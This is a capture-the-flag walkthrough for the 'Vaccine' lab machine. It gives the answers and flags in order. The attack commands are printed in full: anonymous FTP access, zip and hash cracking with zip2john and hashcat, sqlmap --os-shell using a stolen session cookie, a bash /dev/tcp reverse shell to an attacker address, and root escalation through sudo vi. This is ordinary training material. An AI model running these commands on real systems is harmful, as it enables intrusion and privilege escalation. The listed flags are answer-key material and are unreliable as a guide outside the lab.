Vaccine

Initial Scan

sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine

Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

Task 2

This service can be configured to allow login with any password for specific username. What is that username?

Answer: anonymous

Task 3

What is the name of the file downloaded over this service?

ftp 10.129.248.153

Answer: backup.zip

Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

Answer: zip2john

Task 5

What is the password for the admin user on the website?

backup.zip password:41852963

Looking at index.html

Put the hash in a file and crack the hash with hashcat

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Answer:qwerty789

Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection? Looking at sqlmap -h

Answer: --os-shell

Task 7

What program can the postgres user run as root using sudo?

Get the cookie from the Website.

sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell

We get our shell.

Start the listener and run

bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"

Answer: vi

Task 8

Submit user flag

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

Task 9

Submit root flag

Looking at files in the /var/www/html as there's this uses PHP. Looking in the dashboard.php file we see

user=postgres password=P@s5w0rd!

Looking at various options on GTBOBins

Open a file we could only do as sudo vi

type :shell=/bin/sh
ENTER
:shell
ENTER

Answer: dd6e058e814260bc70e9bbdef2715849

Last updated 1 year ago